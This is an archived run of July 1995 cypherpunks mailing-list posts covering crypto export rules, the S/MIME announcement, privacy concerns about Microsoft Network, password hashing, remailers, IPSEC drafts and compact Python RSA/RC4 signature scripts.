Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 24 Jul 95 06:42:16 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <Pine.SUN.3.91.950724093514.18673A-100000@access4.digex.net>
Message-ID: <9507241342.AA06105@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> If one can afford it, I suggest chaining through 
> 1-900-CUT-TRAX
> and
> 1-900-STO-PPER

I doubt you can chain them -- how would they do billing?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 24 Jul 95 06:58:37 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <9507241342.AA06105@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950724095749.19110A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 24 Jul 1995, Perry E. Metzger wrote:

> Date: Mon, 24 Jul 1995 09:42:01 -0400
> From: Perry E. Metzger <perry@imsi.com>
> To: Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: CALLER ID AVOIDANCE 
> 
> 
> Black Unicorn writes:
> > If one can afford it, I suggest chaining through 
> > 1-900-CUT-TRAX
> > and
> > 1-900-STO-PPER
> 
> I doubt you can chain them -- how would they do billing?

You could at one time.  It was great fun.


> 
> .pm
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 24 Jul 95 07:01:01 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <9507241342.AA06105@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950724095946.19110C-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 24 Jul 1995, Perry E. Metzger wrote:

> Date: Mon, 24 Jul 1995 09:42:01 -0400
> From: Perry E. Metzger <perry@imsi.com>
> To: Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: CALLER ID AVOIDANCE 
> 
> 
> Black Unicorn writes:
> > If one can afford it, I suggest chaining through 
> > 1-900-CUT-TRAX
> > and
> > 1-900-STO-PPER
> 
> I doubt you can chain them -- how would they do billing?
> 
> .pm
> 

I just tried both ways, can't anymore.

Pity.


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Plumb" <mp@io.org>
Date: Mon, 24 Jul 95 07:20:40 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <12071.9507111559@exe.dcs.exeter.ac.uk>
Message-ID: <199507241415.KAA26817@wink.io.org>
MIME-Version: 1.0
Content-Type: text


Sorry for taking so long to respond to this.

I have been checking out the Canadian rules for exporting crypto.
Basically (according to "A Guide to Canada's Export Controls",
published by the Department of Foreign Affairs and International
Trade) public domain software can be exported from Canada -- one
might need to file a form with Canadian Customs for each export,
but the export it self is legal. (Public domain is defined as
technology that has been made available without restrictions upon
it's further dissemination. Copyright restrictions do not remove
technology from the public domain. So, I'm not quite sure if PGP
falls within that definition.)

However, goods of U.S. origin are export restricted, unless said
goods are further processed outside the U.S. so as to result in a
substantial change in value, so some of the PGP development would
need to be done in Canada.
--
	-marc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@alias.com>
Date: Mon, 24 Jul 95 07:59:47 PDT
To: "M. Plumb" <aba@atlas.ex.ac.uk
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <199507241415.KAA26817@wink.io.org>
Message-ID: <9507241057.ZM10085@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 24, 10:15am, M. Plumb wrote:
> I have been checking out the Canadian rules for exporting crypto.
> Basically (according to "A Guide to Canada's Export Controls",
> published by the Department of Foreign Affairs and International
> Trade) public domain software can be exported from Canada -- one
> might need to file a form with Canadian Customs for each export,
> but the export it self is legal. (Public domain is defined as
> technology that has been made available without restrictions upon
> it's further dissemination. Copyright restrictions do not remove
> technology from the public domain. So, I'm not quite sure if PGP
> falls within that definition.)
Synchronicity! [argh] I had been considering making a posting along
the same lines. Note that the form required [EXT 1042(09/93)] has a
$15 processing fee. (Which might be peanuts if we're selling a
frigate, but which is a royal pain for a piece of crypto.)

Page 1, "A guide to Canada's Export Controls", April 1994

General "Software" Note
This list does not embargo "software" which is either:
1.	Generally available to the public by being:
	a.	Sold from stock at retail selling points, without
		restriction, by means of:
		1.	Over-the-counter transactions;
		2.	Mail order transactions; or
		3.	Telephone call transactions; and
	b.	Designed for installation by the user without further
		substantial support by the supplier; or
2.	"In the public domain".



<sigh>

Excerpts relating to Canadian Export controls on cryptography should
be up somewhere off http://www.io.org/~samwise/interesting.html#privacy
towards the end of the week.

frodo =)

-- 
Richard Martin 
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@alias.com/g4frodo@cdf.toronto.edu
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 24 Jul 95 11:23:39 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
Message-ID: <ac39334805021004c0ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 7/23/95, Bob Snyder wrote:
>tcmay@sensemedia.net said:
>> With regard to SSL and Netscape not being open to outside developers,
>> several leading e-mail outfits, including Qualcomm, Netscape,
>> Frontier, etc., are working on an interoperable secure e-mail
>> standard called "Secure/MIME," or "S/MIME."
>
>Do you have sources for this information?  MOSS is out there at least as a
>Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the
>original author of Eudora, is pretty active in the MIME community and I doubt
>he would support a second MIME type to do the same thing...

Some of you have expressed skepticism about the mention of "S/MIME."

The longterm significance of S/MIME is debatable, of course. But here's the
press release I got from Jim Bidzos:



Date: Wed, 19 Jul 95 10:34:04 PDT
From: jim@RSA.COM (Jim Bidzos)
To: tcmay@sensemedia.net
Subject: Integrating RSA into Netscape (Netnews and Mail)


FYI...

     RSA News Release

     For information, contact:

     Patrick Corman or Lisa Croel
     Corman/Croel Marketing & Communications
     (415) 326-9648 or (415) 326-0487
     Corman@cerf.net or Lcroel@mediacity.com


     Major Networking and Messaging Vendors Endorse Open Specification for
     Secure E-Mail

     S/MIME Based on RSA Public-Key Encryption Technology

     Redwood Shores, CA -- July 24, 1995 -- Several major networking and
     messaging vendors, in conjunction with leading cryptography developer
     RSA Data Security today announced their endorsement of a specification
     for interoperable e-mail security, to be known as "S/MIME", short for
     "Secure/Multipurpose Internet Mail Extensions".  Several of the
     vendors announced plans to release S/MIME-compliant products next
     quarter.

     The S/MIME specification is based on the popular Internet MIME
     standard (RFC 1521), which provides a general structure for the
     content type of Internet mail messages and allows extensions for new
     content type applications... like security.  S/MIME will allow vendors
     to independently develop interoperable RSA-based security for their
     e-mail platforms, so that an S/MIME message composed and encrypted on
     one vendor's application can be successfully received and decrypted on
     a different one.

     Major vendors who today announced support for the S/MIME secure
     interoperable
     e-mail plan include Microsoft, Lotus, Banyan, ConnectSoft, QUALCOMM,
     Frontier Technologies, Network Computing Devices, FTP Software,
     VeriSign, Wollongong, SecureWare and RSA.

     Sophisticated encryption and authentication technology has been viewed
     as the crucial enabling technology for electronic commerce over the
     World Wide Web -- but encryption has been slow to come to e-mail, with
     most packages offering no security whatsoever. "Commercial e-mail
     packages don't offer encryption because, up until now, there have been
     few open security specifications," said Jim Bidzos, RSA President.
     "Internet Privacy-Enhanced Mail (PEM) is excellent for text-based
     messages. MIME represents the next generation, and has been widely
     adopted because of its ability to handle nearly any content type. The
     new S/MIME allows you to secure this rich content."

     Today's flurry of official endorsements from industry bodes well for
     the S/MIME plan.
     "We fully expect S/MIME to be the defacto standard for
     vendor-independent e-mail encryption.  Solid encryption is something
     that our customers have been asking us for, but up until now, we
     didn't have a viable option.  S/MIME gives them everything they want:
     RSA encryption, digital signatures, and the ability to mix different
     vendors' e-mail systems without losing that security," said Bob
     Dickinson, ConnectSoft Vice President and General Manager Consumer
     Online Products & Services Division.

     "Frontier Technologies believes that in the future most companies will
     routinely encrypt electronic mail messages sent over the public
     Internet," said Dr. Prakash Ambegaonkar, Frontier Technologies'
     president.  "This will only happen once there is a well-understood
     standard for secure e-mail that is easy to implement.  Frontier has
     several years experience in developing secure e-mail solutions.  In
     order to speed the adoption of the S/MIME specification, Frontier
     Technologies intends not only to be one of the first vendors to
     support S/MIME in its networking software, but to also make our
     initial implementation of the S/MIME protocol freely available for
     other vendors to use as a reference."

     "The freedom to have a private conversation is fundamental to personal
     communication that is the essence of electronic mail," said John
     Noerenberg, Director of Engineering for QUEST products at QUALCOMM.
     "Wide-spread acceptance of specs like S/MIME make it possible for
     individuals and organizations alike to conduct their business over the
     net secure in the knowledge that their private business is, in fact,
     private."

     "FTP Software is glad to endorse the S/MIME blueprint for secure
     electronic communication," said John O'Hara, director of development
     for FTP Software.  "Whether communicating with customers, business
     partners or remote offices, companies need to ensure that confidential
     information stays confidential.  This was difficult in the past, since
     organizations are connected through diverse messaging systems from
     competing vendors.  S/MIME eliminates those barriers by facilitating
     implementations across multiple vendor products."

     "Network Computing Devices is commited to answering market demand for
     network information access software providing an even higher level of
     protection and interoperability over LANs and across the Internet,"
     said Mike Harrigan, co-founder and vice president of NCD.  "S/MIME
     will further enhance our customers' ability to utilize our  e-mail
     solution, Z-Mail, and Internet navigation software tool, Mariner, in
     such a secure networked environment.  For this reason we fully intend
     to support the specification provided by S/MIME within the next
     quarter."

     This wll be an exciting catalyst for the rapid deployment of secure,
     interoperable e-mail from most of the industry leaders," said Web
     Augustine, VeriSign vice president of marketing & business
     development.  "VeriSign is committed to making our Digital ID services
     available to all companies that implement S/MIME and desire to work
     with a trusted third-party to certify public keys for their
     end-users."

     S/MIME is based on the intervendor PKCS (Public Key Cryptography
     Standards) which were established by a consortium of RSA, Microsoft,
     Lotus, Apple, Novell, Digital, Sun and the Massachusetts Institute of
     Technology in 1991.  PKCS is the most widely implemented suite of
     commercial cryptographic standards in the United States.  The common
     PKCS specifications allow developers to independently develop secure
     applications that will interoperate with other PKCS-secured
     applications.

     Developers interested in S/MIME can get more information at RSA's web
     site, at http://www.rsa.com, in the "What's New" section.

     RSA Data Security is the world's "brand name" for cryptography, with
     over 10 million copies of RSA encryption and authentication
     technologies installed and in use worldwide. RSA technologies are part
     of existing and proposed standards for the Internet and World Wide
     Web, CCITT, ISO, ANSI, IEEE, and business, financial and electronic
     commerce networks around the globe. The Company develops and markets
     platform-independent developer's kits, end-user products, and provides
     comprehensive cryptographic consulting services. Founded in 1982 by
     the inventors of the RSA Public Key Cryptosystem, the company is
     headquartered in Redwood City, California.

     S/MIME Vendor Contacts:

     Connectsoft                Tamese Robinson 206/450-9965
     Frontier           Dennis Freeman 414/241-4555
     FTP Software               Jill Dudka 508/659-6458
     Qualcomm           John Noerenberg 619/597-5103
     Microsoft          Tom Johnston 206/936-3233
     Lotus                      Kevin Kosh 617/860-5632
     Wollongong         Bob Brodie 415/962-7203
     Banyan             Jay Seaton 508/898-1000
     NCD                        Mike Harrigan 415/694-0663
     SecureWare         David Luther 404315-6295
     VeriSign           Web Augustine 415/508-1151

     ###

     RSA Public Key Cryptosystem and PKCS are trademarks of RSA Data
     Security, Inc. All other product or company names are trademarks of
     their respective corporations.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Bizzell <tomb@syntec.com>
Date: Mon, 24 Jul 95 09:54:11 PDT
To: cypherpunks@toad.com
Subject: MSN privacy
Message-ID: <QQyzuh11543.199507241652@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Here is some info that was circulating around our office today.


> *** Forwarding note from KKASTRP --RHQVM12  07/10/95 10:43 ***
> To: KURT    --RHQVM02  Anderson, K. K.    LLANDER --RHQVM17  Anderson, L.L.
>
>            Karen R. Kastrup 8/826-4664 9/(914)766-4664
>            Manager, Services Accounting
>            Somers 4, 3J36
> Subject: Windows 95
>
> *** Forwarding note from KASTRUP --ISSCVM   07/10/95 10:31 ***
> To: KKASTRP --RHQVM12
>
> *** Resending note of 07/10/95 09:43
> STAN KASTRUP
> ISSC - INFORMATION STRATEGY & MANAGEMENT
> 8/351-3229 9/(914) 288-3229
> SUBJECT: Windows 95
> Amazing!  (I chopped off about 10 "forwards.")
>   ------- Forwarded Message
>
>    >  From: Carlos Shaw       IBMMAIL:USIB2T2D     cshaw@vnet.ibm.com
>    >  ***************************************************************
>    >  Subject: news on Windows95
>    >  ----------------------------------------------------------------------
>    >  Newsgroups: comp.risks
>    >  From: cnorloff@tecnet1.jcte.jcs.mil
>    >
>    >  Date: Wed, 17 May 95 13:44:40 EDT
>    >
>    >  Microsoft officials confirm that beta versions of Windows 95 include a
>    >  small viral routine called Registration Wizard.  It interrogates every
>    >  system on a network gathering intelligence on what software is being run
>    >  on which machine.  It then creates a complete listing of both Microsoft's
>    >  and competitors' products by machine, which it reports to Microsoft when
>    >  customers sign up for Microsoft's Network Services, due for launch later
>    >  this year.
>    >
>    >  "In Short" column, page 88, _Information Week_ magazine, May 22, 1995
>    >
>    >  The implications of this action, and the attitude of Microsoft to plan
>    >  such action, beggars the imagination.
>    >
>    >  An update on this. A friend of mine got hold of the beta test CD
>    >  of Win95, and set up a packet sniffer between his serial port and the
>    >  modem. When you try out the free demo time on The Microsoft Network, it
>    >  transmits your entire directory structure in background.
>    >  This means that they have a list of every directory (and, potentially
>    >  every file) on your machine. It would not be difficult to have something
>    >  like a FileRequest from your system to theirs, without you knowing about
>    >  it. This way they could get ahold of any juicy routines you've written
>    >  yourself and claim them as their own if you don't have them copyrighted.
>    >
>    >  Needless to say, I'm rather annoyed about this.
>    >  So spread the word as far and wide as possible: Steer clear of Windows
> 95.
>    >  There's nothing to say that this "feature" will be removed in the final
>    >  release.
>    >
>    >  David
>    >
>    >  Carlos Shaw                | nodeid/userid: stlvm6(cshaw)
>    >  IBM - STL (J95/E443)       | (408) 463-4995; (tie) 8-543-4995
>    >  555 Bailey Ave             | fax (408) 463-4763; (tie) 8-543-
>    >  San Jose, CA 95141         | CompuServe id: 73203,1424
>    > Subj: news on Windows95
>    >
>
>
>
>
>-------- End of Forwarded Message
>
>

-------------------------------------
E-mail: dough@syntec.com (Doug Hadley)
Date: 07/24/95
Time: 10:54:04
-------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 24 Jul 95 09:09:10 PDT
To: cypherpunks@toad.com
Subject: PKA_boo
Message-ID: <199507241608.MAA12003@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-24-95. NYPaper:


   [Denise Caruso's column] "New Microsoft network will offer
   a wealth of privacy."

      It seems unthinkable that anything has been left unsaid
      about the Microsoft Network. And even less has been said
      about MSN's design, which Microsoft has said complies
      with the new data-privacy rules that the European Union
      is expected to adopt in September. The new European
      policy would set out clear guidelines about the way in
      which companies -- in this case, Microsoft and its
      independent content providers -- can collect and use the
      personal data about their European customers that the
      companies gather electronically. Microsoft has said it
      plans to extend the same privacy provisions to its
      American customers. The European provisions are a
      striking departure from current practices in the United
      States, where few restrictions protect consumers from
      marketeers, who collect and sell consumers' personal
      information.                                   PEK_boo










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 24 Jul 95 11:32:56 PDT
To: Tom Bizzell <tomb@syntec.com>
Subject: Microsoft Stealing...IS....Re: MSN privacy
In-Reply-To: <QQyzuh11543.199507241652@relay3.UU.NET>
Message-ID: <Pine.BSI.3.91.950724132816.21153A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't see why you call it what it really is.
It is stealing.
For if you reversed the process on Microsoft,
as you had any contact with them,
I'm sure that's what they'd call it.

It no different that being seductive
while you remove their wallet.

Stealing yes, privacy no.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 24 Jul 95 11:06:46 PDT
To: Mole Rat <an253398@anon.penet.fi>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507200542.AA23518@anon.penet.fi>
Message-ID: <Pine.BSD/.3.91.950724135143.25983E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jul 1995, Mole Rat wrote:

>      Sounds like an untapped market segment.  In which periodicals
>      should one advertise consulting services in order to cover the
>      mobster market?

For those of the anonymous pay-me-in-(digitial/physical)-cash only 
underground types, yes.

>      Seriously, I imagine that organized crime, like any other
>      business, uses computers.  Their level of crypto usage could be
>      impressive, given the incentives.

Speculation of course.  No better, or closer to the truth either one way 
or the other?  (Any of you anons work for the mob?  if so, is the mob 
'puter-happy?)

>      "There is no honor among thieves."  Wiretaps, bugs, tails,
>      informants, and good, old-fashioned, physical intimidation
>      probably produce plenty of leads.

Two logical possibilities.

  0. Mobsters still get caught and thrown in jail.
  1. They don't use crypto at all.  All records are in the open and 
searchable.  LEA's wet dream.
  2. They use strong crypto and can't be caught at all.  LEA's nightmare.
  3. They use crypto, but are still catchable (oops, the secret is out of 
the bag now, cancel all the computer related RICO nonsense.)
  4. They don't use crypto, but keep no records, or hide them well.  They 
can still be caught by LEA's.

  3 & 4 are the most likely, and the LEA's shameful little secret.  They 
cry wolf to set a wolf trap, but meanwhile they're hunting wabbits, not 
wolves.  

>      I wasn't entirely facetious above about working for the mob,
>      they probably pay well and don't bother with FICA and such.  Plus
>      there's that "family" atmosphere....

Errmm.. precisely the reason to stay away from them.  While the first few 
parts of your above paragraph are quite tempting, the last sentence is 
deadly.  You can't quit from your "family" without cement shoes.  So I'll 
stay away from that line of ...um... work. 


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Gorsuch <chrisg@chrisg.itg.ti.com>
Date: Mon, 24 Jul 95 12:13:41 PDT
To: cypherpunks@toad.com
Subject: re: big dictionaries
Message-ID: <199507241910.OAA00283@chrisg.itg.ti.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill,
   Good point about using a "slow" hash algorithm.  A "dictionary" attack on
the hash should fail because, in order to currently use the password the old
password had to not be in the dictionary in the first place.  However "keyspace"
attacks (brute force) would still be quite feasible.  Would probably want to
put something similiar to a salt in there to help increase the keyspace.
   Keep in mind that the only reason I suggested a hash at all is to prevent an
admin who, in general, would not go through the effort to replace login/password
or install a sniffer to get your password, but might be "unnecessarily" tempted
by having easy to access passwords stored in plaintext on the server (still 
in a file only the admin could read).  Basically just as a method to keep
honest people honest.
   To verify that a user wasn't using a variation on the original, you would 
want to only store the hash of the original, but do hashes of the variants on
the "new" password and compare with the stored hash of the old password.  And
of course, only store a password AFTER it has been changed.
   Really paranoid admins should use challenge/response/one-time passwords 
with/or kerberos.

chris gorsuch
chrisg@ti.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Mon, 24 Jul 95 11:15:58 PDT
To: shabbir@panix.com (Shabbir J. Safdar)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507220451.AAA25935@panix4.panix.com>
Message-ID: <199507241813.OAA20458@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> Let's read the bill and get ready for a fight.  We should hold Grassley
> accountable for this next election.  But we're spinning our wheels by
> acting against every bill that affects one of our issues.
> 
> -Shabbir

I'd agree with the gist of Shabbir's entire message, except the last 
sentence, which I think needs some qualification.  Trying to fight every 
useful fight right now *is* counter-productive, because we're not at a 
stage yet where any of our organizations, or our coalitional 
meta-organization, can handle the load.  And the grassroots activist
infrastructure of the net can't handle it either.  But, that's not the 
way it should be.  We need to, and if we all work at it, we will, get to 
the state at which we can handle the load, and can fight all the good fights.

Part of what's needed is, frankly, for folks like those reading this 
message to take a little time out from endless arguments on newsgroups 
and mailing lists, from all the entertainment and fund, and become a 
little more politically active so we can preserve the possibility of 
having any fun at all.  How many of you are organizing groups like 
EF-Houston or VTW or SEA on a local or state basis?  I don't imagine many 
virtual hands are raising.  Hop to it folks.  This is no a 
one-dimensional fight, it's three dimensional.  You've got lobbying and 
national-level policy work being done, but local grassroots organizing 
via the net is still in a larval stage, and needs to be advanced. So does 
coordinated response to crap journalism and lack of serious coverage of 
the issues we find important.  Get in touch if you're interested in 
helping start local groups.  I'll keep a geographical list and try to put 
fairly close matches in contact with eachother.  


--
<A HREF="http://www.eff.org/~mech/">          Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>   Online Services Mgr.      



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 24 Jul 95 11:54:53 PDT
To: cypherpunks@toad.com
Subject: NOD_off
Message-ID: <199507241854.OAA01658@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-24-95. NYPaper:


   "For I.B.M. Faithful, Questions About Windows 95."

      These are difficult days for OS/2 users."Every time I
      say I am an OS/2 user, I get immediately marginalized,"
      an elderly woman confided to a young man sitting next to
      her at last week's OS/2 World convention in Boston.
      "It's amazing what saying you are an OS/2 user brings
      out in people."

      "You just have to explain that you are at the cutting
      edge of a powerful new technology," the young man
      advised her with a heavy dose of sarcasm.      WRP_spd


   "Computer Pornography Hearing Will Not Include Expert
   Witness."

      The principal researcher in a computer pornography study
      will not testify at today's Senate hearing on children
      and computer pornography. Senator Charles E. Grassley,
      Republican of Iowa, removed the researcher, Marty Rimm,
      from the witness list late last week, after Carnegie
      Mellon University announced a formal investigation into
      whether Mr. Rimm and his faculty advisers had violated
      academic and ethical guidelines in preparing and
      publishing their study.                        WIT_les



   1 +1: NOD_off









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Mon, 24 Jul 95 18:21:06 PDT
To: mp@io.org (M. Plumb)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <199507241415.KAA26817@wink.io.org>
Message-ID: <m0saTpk-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text




marc:
> However, goods of U.S. origin are export restricted, unless said
> goods are further processed outside the U.S. so as to result in a
> substantial change in value, so some of the PGP development would
> need to be done in Canada.

How about compiling it? THAT is "further processing"......

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 24 Jul 95 13:43:58 PDT
To: cypherpunks@toad.com
Subject: Python export-a-cryptosystems
Message-ID: <m0saUL1-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I hadn't seen this on the list, so I'm forwarding it.

(I may have skipped it in my 'catchup on a rainy day' mail archive.)

A friend arranged a lunch today with Guido (the author of Python,
Guido van Rossum <guido@CNRI.Reston.VA.US>) and a few other friends.
I haven't formed an opinion of Python yet.

Notice that bc/dc isn't needed.

------- Forwarded Message

Date:    06 Jul 1995 14:20:13 +0000
From:    Andrew KUCHLING <fnord@maggie.cs.mcgill.ca>
To:      python-list@cwi.nl
Subject: Re: Obfuscated Python

Following modifications from Richard Jones and Guido van Rossum, we've
now achieved a 4-line RSA script.  (Shouldn't we all be doing some
*real* work, I wonder? :) ) I've added a 2-line one-time pad program,
which simply XORs the contents of the two files whose names are
provided on the command line.  Generation of random data (and securely
exchanging it with your correspondent) is left as an exercise for the
reader.

So, the Python export-a-crypto-system-sigs are:

   Try: echo 'This is a test.' | rsa.py 10001 1967cb529
#!/usr/local/bin/python -- -export-a-crypto-system-sig -RSA-in-4-lines-Python
from sys import*;from string import*;a=argv;[s,p,q]=filter(lambda x:x[:1]!=
'-',a);d='-d'in a;e,n=atol(p,16),atol(q,16);l=(len(q)+1)/2;o,inb=l-d,l-1+d
while s:s=stdin.read(inb);s and map(stdout.write,map(lambda i,b=pow(reduce(
lambda x,y:(x<<8L)+y,map(ord,s)),e,n):chr(b>>8*i&255),range(o-1,-1,-1)))

   Try: echo 'This is a test.' | rc4.py messagekey
#!/usr/local/bin/python -- -export-a-crypto-system-sig -RC4-in-4-lines-Python
from sys import*;st,x,y,i2,k,s=range(256),0,0,0,map(ord,argv[1]*256)[:256],1
for i in st[:]:i2=(k[i]+st[i]+i2)%256;st[i],st[i2]=st[i2],st[i]
while(s):s=stdin.read(1);x=(x+1)%256;y,c=(y+st[x])%256,len(s)and ord(s);(
st[x],st[y])=st[y],st[x];stdout.write(chr(c^st[(st[x]+st[y])%256])[:len(s)])

   Try: otp.py message pad >ciphertext
#!/usr/local/bin/python -- -export-a-crypto-system-sig -OTP-in-2-lines-Python
from sys import*;t=p=1;s,i,j=stdout,open(argv[1], 'r'),open(argv[2], 'r')
while(t and p):t,p=i.read(1),j.read(1);t and p and s.write(chr(ord(t)^ord(p)))

        Andrew Kuchling
        andrewk@cst.ca
        fnord@cs.mcgill.ca
               (http://www.cs.mcgill.ca/~fnord)


sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Mon, 24 Jul 95 14:18:12 PDT
To: cypherpunks@toad.com
Subject: IPSEC
Message-ID: <9507242118.AA04814@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


For those interested in reading up on the IPSEC work, check out
ds.internic.net's "internet-drafts" directory. The following are the
drafts that you will want to look at.

draft-ietf-ipsec-ah-md5-03.txt
draft-ietf-ipsec-arch-02.txt
draft-ietf-ipsec-auth-02.txt
draft-ietf-ipsec-esp-01.txt
draft-ietf-ipsec-esp-des-cbc-04.txt
draft-ietf-ipsec-photuris-02.txt

I believe that the -ah-xx.txt draft is missing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 24 Jul 95 17:55:50 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: An idea about Java and remailer clients and servers...
Message-ID: <v02120d03ac39fe80b194@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



> I forgot to add. There is no reason User X has to run his remailer
>immediately. His software could simply commit to running a remailer for
>1 hour at some specified future date < some threshold. Any messages
>sent to him for remailing would be queued until that time. Therefore,
>all your technique would tell you is that the user remailed a message
>sometime between date X and date Y. if Y-X > few days to week or two,
>the intelligence gathered on User X is miniscule. Traffic analysis would
>detect User X using the remailer network anyway.
>

When I've thought about this, it's been from the p.o.v. of message
senders being able to earn prepaid service tokens (not unlike
digital cash) for offering their machine as a remailer for a set
period of time or number of message or total bandwidth or
whatever. This activity could be completely asynchronous to any
origination of messages, and, in fact, a regular habit of accumulating
tokens like this would make for excellent cover traffic.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Mon, 24 Jul 95 16:32:49 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: IPSEC
In-Reply-To: <9507242118.AA04814@webster.imsi.com>
Message-ID: <199507242332.TAA07652@thor.cs.umass.edu>
